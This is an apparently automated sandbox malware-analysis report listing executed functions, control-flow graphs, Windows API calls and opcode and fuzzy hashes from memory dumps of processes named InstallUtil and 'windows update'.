26261 585d103 26260->26261 26262 585d0b5 26260->26262 26263 5858a20 9 API calls 26261->26263 26264 585d134 26263->26264 26265 5852018 26266 5852019 SetWindowLongW 26265->26266 26267 5852084 26266->26267

                                                                                Executed Functions

                                                                                Function 01807365 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 759 1807365-1807431 CreateActCtxA 761 1807433-1807439 759->761 762 180743a-1807494 759->762 761->762 769 18074a3-18074a7 762->769 770 1807496-1807499 762->770 771 18074b8 769->771 772 18074a9-18074b5 769->772 770->769 773 18074b9 771->773 772->771 773->773
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01807421
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID: U
                                                                                • API String ID: 2289755597-3372436214
                                                                                • Opcode ID: 5bfcee0eaad949addea84d60f5e49f4530882abb60a98fa79507633bccde611e
                                                                                • Instruction ID: f4cd2974aa9aee718dca8a2682928cec4bc71f89e0903be6fea29b1ec3dcc3ec
                                                                                • Opcode Fuzzy Hash: 5bfcee0eaad949addea84d60f5e49f4530882abb60a98fa79507633bccde611e
                                                                                • Instruction Fuzzy Hash: 004112B0C0061DCEDB25DFA9C884BCDBBF5BF49304F20806AD418AB254DB756A4ACF90
                                                                                Function 0180BFF7 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 775 180bff7-180c006 776 180c008-180c00c 775->776 777 180c00d-180c017 775->777 776->777 778 180c043-180c047 777->778 779 180c019-180c026 call 180b35c 777->779 780 180c049-180c053 778->780 781 180c05b-180c09c 778->781 786 180c028 779->786 787 180c03c 779->787 780->781 788 180c0a9-180c0b7 781->788 789 180c09e-180c0a6 781->789 834 180c02e call 180c290 786->834 835 180c02e call 180c2a0 786->835 787->778 790 180c0b9-180c0be 788->790 791 180c0db-180c0dd 788->791 789->788 794 180c0c0-180c0c7 call 180b368 790->794 795 180c0c9 790->795 793 180c0e0-180c0e7 791->793 792 180c034-180c036 792->787 796 180c178-180c1f2 792->796 797 180c0f4-180c0fb 793->797 798 180c0e9-180c0f1 793->798 800 180c0cb-180c0d9 794->800 795->800 827 180c1f4-180c1f5 796->827 828 180c1f9-180c238 796->828 801 180c108-180c111 call 180b378 797->801 802 180c0fd-180c105 797->802 798->797 800->793 808 180c113-180c11b 801->808 809 180c11e-180c123 801->809 802->801 808->809 810 180c141-180c14e 809->810 811 180c125-180c12c 809->811 817 180c150-180c16e 810->817 818 180c171-180c177 810->818 811->810 813 180c12e-180c13e call 180b388 call 180b398 811->813 813->810 817->818 827->828 829 180c240-180c26b GetModuleHandleW 828->829 830 180c23a-180c23d 828->830 831 180c274-180c288 829->831 832 180c26d-180c273 829->832 830->829 832->831 834->792 835->792
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d879805de92be979df53d3e33c03f022824c2c7e7f339f7bd3de19a83958eace
                                                                                • Instruction ID: 7117ab72a25d54e3b120339f7584bebb7682493c372a21ce0eb49074620dd1e6
                                                                                • Opcode Fuzzy Hash: d879805de92be979df53d3e33c03f022824c2c7e7f339f7bd3de19a83958eace
                                                                                • Instruction Fuzzy Hash: 8D819870A00B098FD765CF29D84475ABBF1FF88300F008A6DD54AD7A90DB35EA49CB91
                                                                                Function 0585CD54 Relevance: 1.6, APIs: 1, Instructions: 116threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 836 585cd54-585dd99 840 585dda6 836->840 841 585dd9b-585dda4 836->841 842 585dda8-585ddad 840->842 841->842 843 585ddcd-585de62 842->843 844 585ddaf-585ddcc 842->844 851 585de64-585de6c 843->851 852 585de6e-585de9e EnumThreadWindows 843->852 851->852 853 585dea7-585ded4 852->853 854 585dea0-585dea6 852->854 854->853
                                                                                APIs
                                                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 0585DE91
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: EnumThreadWindows
                                                                                • String ID:
                                                                                • API String ID: 2941952884-0
                                                                                • Opcode ID: ae4e989d106da6a3df0af550266d7b4b248842af4f79cdf755f260b52a304e42
                                                                                • Instruction ID: 495e9e97a73384b8950c3d4a5cdfe4c4981c4d51d92a970aab848f60b8e1e20b
                                                                                • Opcode Fuzzy Hash: ae4e989d106da6a3df0af550266d7b4b248842af4f79cdf755f260b52a304e42
                                                                                • Instruction Fuzzy Hash: 8841CF71A052098FD714DF99C844BBEBBF6FF88320F14842AD919E7390CB789905CBA5
                                                                                Function 018063D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 858 18063d4-1807431 CreateActCtxA 861 1807433-1807439 858->861 862 180743a-1807494 858->862 861->862 869 18074a3-18074a7 862->869 870 1807496-1807499 862->870 871 18074b8 869->871 872 18074a9-18074b5 869->872 870->869 873 18074b9 871->873 872->871 873->873
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 01807421
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: cdf3677d58ad8f2473e71a0d39fc6280266b7c8f7bcfbafa526496c0e3f5c6c3
                                                                                • Instruction ID: 973b4156f42539834fd45fc19d9256e02d54640556773a5556f92b5cde15c8fc
                                                                                • Opcode Fuzzy Hash: cdf3677d58ad8f2473e71a0d39fc6280266b7c8f7bcfbafa526496c0e3f5c6c3
                                                                                • Instruction Fuzzy Hash: 554101B0C0061DCBDB25DFA9C884BDDBBF5BF49304F21806AD418AB254DB75694ACF90
                                                                                Function 05854350 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 875 5854350-585438c 878 5854392-5854397 875->878 879 585443c-585445c 875->879 880 5854399-58543d0 878->880 881 58543ea-5854422 CallWindowProcW 878->881 885 585445f-585446c 879->885 888 58543d2-58543d8 880->888 889 58543d9-58543e8 880->889 882 5854424-585442a 881->882 883 585442b-585443a 881->883 882->883 883->885 888->889 889->885
                                                                                APIs
                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05854411
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: CallProcWindow
                                                                                • String ID:
                                                                                • API String ID: 2714655100-0
                                                                                • Opcode ID: b8661f45870eff3879300003841aeb9b05e99f86c403394359a812035429b672
                                                                                • Instruction ID: ef3d7bd22716b702be1850b61d3ae3fa0ad0e395c7dc2e6fcb734cf7e75a3657
                                                                                • Opcode Fuzzy Hash: b8661f45870eff3879300003841aeb9b05e99f86c403394359a812035429b672
                                                                                • Instruction Fuzzy Hash: 83410BB99002098FCB14DF99C448AAAFBF6FF89324F24C459D919A7321D775A845CFA0
                                                                                Function 0585B190 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 891 585b190-585b1a2 892 585b1aa-585b1b5 891->892 893 585b1a5 call 5859d1c 891->893 894 585b1b7-585b1c7 call 585ac50 892->894 895 585b1ca-585b25c CreateIconFromResourceEx 892->895 893->892 900 585b265-585b282 895->900 901 585b25e-585b264 895->901 901->900
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFromIconResource
                                                                                • String ID:
                                                                                • API String ID: 3668623891-0
                                                                                • Opcode ID: ccabf77ec09067cf200429ea9fddc71d9364b9896878f05e0f83014c5f7c8ea1
                                                                                • Instruction ID: b899ec7266bec8b3f072a553371476d9fec2341f506c5a9b84981ff6c9e8b510
                                                                                • Opcode Fuzzy Hash: ccabf77ec09067cf200429ea9fddc71d9364b9896878f05e0f83014c5f7c8ea1
                                                                                • Instruction Fuzzy Hash: 403169729043489FCB11DFA9C844AEEBFF8EF09321F14805AE954E7261C3359854DBA1
                                                                                Function 0180611C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 904 180611c-180681c DuplicateHandle 906 1806825-1806842 904->906 907 180681e-1806824 904->907 907->906
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0180674E,?,?,?,?,?), ref: 0180680F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: ec0c9cf313a72cd1ec88e4aec5edc20e43d1607963e53b2177ff0105b955051e
                                                                                • Instruction ID: dd499944a0a4be2a8fcf98b4f6076965607e1605ced6ba77ea1d87a37d1afca4
                                                                                • Opcode Fuzzy Hash: ec0c9cf313a72cd1ec88e4aec5edc20e43d1607963e53b2177ff0105b955051e
                                                                                • Instruction Fuzzy Hash: CA21E5B59002089FDB10CF9AD984ADEBFF8FB48310F14841AE918A7350D378AA54CFA1
                                                                                Function 01806783 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 910 1806783 911 1806788-180681c DuplicateHandle 910->911 912 1806825-1806842 911->912 913 180681e-1806824 911->913 913->912
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0180674E,?,?,?,?,?), ref: 0180680F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 5df06f61b6692b80b9d62a4d3b7ce5114593e3bf5eca0928e7152e0128c1bc2c
                                                                                • Instruction ID: 64df1c5f655567f49d8eba89ac180606de3cf181216b2095ad7b2b4521b47b83
                                                                                • Opcode Fuzzy Hash: 5df06f61b6692b80b9d62a4d3b7ce5114593e3bf5eca0928e7152e0128c1bc2c
                                                                                • Instruction Fuzzy Hash: 0121E4B59002099FDB10CF9AD984ADEFFF8FB48310F14801AE918A3350D378AA54CFA5
                                                                                Function 0585CD64 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 916 585cd64-585de62 918 585de64-585de6c 916->918 919 585de6e-585de9e EnumThreadWindows 916->919 918->919 920 585dea7-585ded4 919->920 921 585dea0-585dea6 919->921 921->920
                                                                                APIs
                                                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 0585DE91
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: EnumThreadWindows
                                                                                • String ID:
                                                                                • API String ID: 2941952884-0
                                                                                • Opcode ID: 2866ba867ffef691f21059877390ab46c0ff98db187980932adf9161edddc5e5
                                                                                • Instruction ID: 6e7692ad0ebc7455d64ab6918abcbb9aa1069cb15edfa58a54aa0cbd1c4731ad
                                                                                • Opcode Fuzzy Hash: 2866ba867ffef691f21059877390ab46c0ff98db187980932adf9161edddc5e5
                                                                                • Instruction Fuzzy Hash: C52149759002098FDB14DF9AC844BEEFBF5FB98320F108429D959A3240D778A945CFA1
                                                                                Function 05859D1C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 925 5859d1c-585b25c CreateIconFromResourceEx 927 585b265-585b282 925->927 928 585b25e-585b264 925->928 928->927
                                                                                APIs
                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0585B1AA,?,?,?,?,?), ref: 0585B24F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFromIconResource
                                                                                • String ID:
                                                                                • API String ID: 3668623891-0
                                                                                • Opcode ID: b48332d6745d80f115dcaa8311c447a3537e0ea0280ceaa7aca2a8ee708e1a10
                                                                                • Instruction ID: 61bc625dbbc97078d1ca213094f3b266ff844f5517989e31856f0f026a68820d
                                                                                • Opcode Fuzzy Hash: b48332d6745d80f115dcaa8311c447a3537e0ea0280ceaa7aca2a8ee708e1a10
                                                                                • Instruction Fuzzy Hash: 53113AB580024D9FDB10DF9AC844BEEBFF8EB58321F14841AE955A7250C379A954CFA4
                                                                                Function 05852010 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 931 5852010-5852012 932 5852014-5852016 931->932 933 5852019-5852082 SetWindowLongW 931->933 932->933 934 5852084-585208a 933->934 935 585208b-585209f 933->935 934->935
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?), ref: 05852075
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                • Opcode ID: 77a428ab8cb59afb68747b84cca729e63656dc37a3e6bda9f3c98bd3262ee3e2
                                                                                • Instruction ID: f154116250f481922e5f75e3b51ef071971b1b6620187d96360b6d09386b0cbc
                                                                                • Opcode Fuzzy Hash: 77a428ab8cb59afb68747b84cca729e63656dc37a3e6bda9f3c98bd3262ee3e2
                                                                                • Instruction Fuzzy Hash: EF1125B98002488FDB10DF99C585BDFBBF8EB49324F10841AD919A7240C379A944CFA1
                                                                                Function 0180C1F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0180C25E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2239861700.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1800000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: cbbcd688dbf76e3fa181fea89369cfe60f0c8c73f5e5e8e56784464535111934
                                                                                • Instruction ID: 1b014fcbcc1534a1b453a0dd1ca6156f48b78fbb0f00289ce81e6e6c8893370a
                                                                                • Opcode Fuzzy Hash: cbbcd688dbf76e3fa181fea89369cfe60f0c8c73f5e5e8e56784464535111934
                                                                                • Instruction Fuzzy Hash: 0C1122B6C003498FDB10DF9AC844ADEFBF4EF89710F10856AD928A7650C379A645CFA1
                                                                                Function 05859D60 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,?,?,?), ref: 0585B5AD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: d468273bae3e566c19b43333b14face854dceb1f942304427e303f8e2b1f77bb
                                                                                • Instruction ID: d657838b78e1ac55166cba1b8ca36465cc3812bdc6b45411b418cac597c57719
                                                                                • Opcode Fuzzy Hash: d468273bae3e566c19b43333b14face854dceb1f942304427e303f8e2b1f77bb
                                                                                • Instruction Fuzzy Hash: 5411F2B58003489FCB10DF9AD484BDEBBF8FB58321F108459E919A7240C379A944CFA1
                                                                                Function 05852018 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?), ref: 05852075
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                • Opcode ID: abadb6025941921a6b15a4f002f227bb204d96dfa682697e2eb9b3245c84bc68
                                                                                • Instruction ID: afa145ee4f973167a474a4633bfb6877bfa1df65204ed50bc225f6a4f88b3bea
                                                                                • Opcode Fuzzy Hash: abadb6025941921a6b15a4f002f227bb204d96dfa682697e2eb9b3245c84bc68
                                                                                • Instruction Fuzzy Hash: DE1115B58002498FDB10DF9AC584BDEFBF8FB48320F10841AD919A3340C379A944CFA1
                                                                                Function 0585B54A Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,?,?,?), ref: 0585B5AD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2248066354.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_5850000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: de5a447a173b0f47262828b5ea565916edd3944bfc4d06f245239d6664928131
                                                                                • Instruction ID: a4e1bc386bb9e8ded29bd5ab5b4cbdc5020b2087ab925b6990c6dcd94866c48c
                                                                                • Opcode Fuzzy Hash: de5a447a173b0f47262828b5ea565916edd3944bfc4d06f245239d6664928131
                                                                                • Instruction Fuzzy Hash: 041112B5800349CFDB10DF99C585BDEBBF4FB58321F10845AE959A3240C379AA84CFA1
                                                                                Function 0157D01C Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2237541640.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_157d000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a736d69a2a05f951746527f7b519643171ac658b6977bb20f7b3285b591a343b
                                                                                • Instruction ID: 424bd58ed75af175ca6e78bd2876a6a5b931a2bd61415203ee90ea82a6a808f3
                                                                                • Opcode Fuzzy Hash: a736d69a2a05f951746527f7b519643171ac658b6977bb20f7b3285b591a343b
                                                                                • Instruction Fuzzy Hash: D3210075604204DFCB16DF68E985B26BFB5FF88314F20C96DD90A0F256D33AD406CA61
                                                                                Function 0157D006 Relevance: .1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2237541640.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_157d000_InstallUtil.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9a0b87fb8932297bdb6981f3d67939c8598be28b1db1a6d04a459693dc6ffb99
                                                                                • Instruction ID: b6707d8b41a019acbff81d0a2423f2f46f5c5726744ebd24f1f981e7e0b68659
                                                                                • Opcode Fuzzy Hash: 9a0b87fb8932297bdb6981f3d67939c8598be28b1db1a6d04a459693dc6ffb99
                                                                                • Instruction Fuzzy Hash: 222159755093808FDB03CF24D994B15BF71FF46214F28C5AAD8498F6A7C33A980ACB62

                                                                                Executed Functions

                                                                                Function 00CA04EC Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2236673712.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_ca0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8aq
                                                                                • API String ID: 0-538729646
                                                                                • Opcode ID: cd00f8e9bd74e28cd2c41e7caba758706195e77c7872faf2de5c78c0a6ec1d72
                                                                                • Instruction ID: c8511b96116e3bca6511cfa9baee4d81d438211782143355696ef3edbf2d7f2e
                                                                                • Opcode Fuzzy Hash: cd00f8e9bd74e28cd2c41e7caba758706195e77c7872faf2de5c78c0a6ec1d72
                                                                                • Instruction Fuzzy Hash: F8F082305092849FC702DFB8ED51ADDBBB4AE4620071485DAC448EB163DA349E05DB11
                                                                                Function 00CA0888 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2236673712.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_ca0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP]q
                                                                                • API String ID: 0-2175968468
                                                                                • Opcode ID: a0fa79cf39ed9cd44fc3355346633274148cc799f1b4da8c65a0b68df87e6025
                                                                                • Instruction ID: cde18e658e52a1f676c9ab909ab359aabd7cac9cb30789a905a28345d866cace
                                                                                • Opcode Fuzzy Hash: a0fa79cf39ed9cd44fc3355346633274148cc799f1b4da8c65a0b68df87e6025
                                                                                • Instruction Fuzzy Hash: 004148347406118FCB58EF79C49892E7BE2BF8971572548A8E506CB3B6DB39DC02CB80
                                                                                Function 00CA0898 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2236673712.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_ca0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP]q
                                                                                • API String ID: 0-2175968468
                                                                                • Opcode ID: ca26f86ada4d7bd02c661e01c8a9da70b43f0c5e384424088c95ca765d0a0739
                                                                                • Instruction ID: 2800dff826eaf18c58370dde09a89adc208f957bcc5816c87662a4c5ea3b7432
                                                                                • Opcode Fuzzy Hash: ca26f86ada4d7bd02c661e01c8a9da70b43f0c5e384424088c95ca765d0a0739
                                                                                • Instruction Fuzzy Hash: 6B4138747402118FCB58EF79C45892E7BE6BF8971572548A8E806CB3B6DE39DC42CB80
                                                                                Function 00CA0A40 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2236673712.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_ca0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $]q
                                                                                • API String ID: 0-1007455737
                                                                                • Opcode ID: 5bb51e7b95d59087aea6a424adf154989ac809685e4a88590ff112510e48ea59
                                                                                • Instruction ID: db278704809ff8d3e9eb14c2902d37eb3f73b92b687427e8c80eb6f2d033174c
                                                                                • Opcode Fuzzy Hash: 5bb51e7b95d59087aea6a424adf154989ac809685e4a88590ff112510e48ea59
                                                                                • Instruction Fuzzy Hash: 052135323043169FD7158A7DE890B2A7BE9FFC2798B28407BD019C7292DA71DC06D3A1
                                                                                Function 00CA0848 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2236673712.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_ca0000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8aq
                                                                                • API String ID: 0-538729646
                                                                                • Opcode ID: 8b00e15dcc47b85ab9c4fb0db3f232fa2b31f29cb4ed7f2bd81e7b3d1b708fb8
                                                                                • Instruction ID: 41f6382f3a0c8f1c4c709dc19d0f69cecf4dc9654cfaf35697b9f5acb85c62ee
                                                                                • Opcode Fuzzy Hash: 8b00e15dcc47b85ab9c4fb0db3f232fa2b31f29cb4ed7f2bd81e7b3d1b708fb8
                                                                                • Instruction Fuzzy Hash: 88E0C230A0020DEFCB00EFB8EA41D5EB3BDEB85244B20C5A9D408E3254DE34EF009B81
                                                                                Function 009FD508 Relevance: .1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2235144514.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_9fd000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 44d2bb7d2e30cf37995e5fc6320df9108ceea1b1b61b6a6bd17afbf820d852d1
                                                                                • Instruction ID: 9a9d7cd422b461bbcf87f755b233e6db078707899286571c6e4b6f6b01a50b48
                                                                                • Opcode Fuzzy Hash: 44d2bb7d2e30cf37995e5fc6320df9108ceea1b1b61b6a6bd17afbf820d852d1
                                                                                • Instruction Fuzzy Hash: D7213771505208DFDB05DF14D9C0F36BF6AFB98318F248569FA090B25AC33AD816D7A2
                                                                                Function 009FD503 Relevance: .1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2235144514.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_9fd000_windows update.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                • Instruction ID: ffa519a7f09b04dde015fceb769ef7c36caad6f92aa8adfc59cd6d4d14ded550
                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
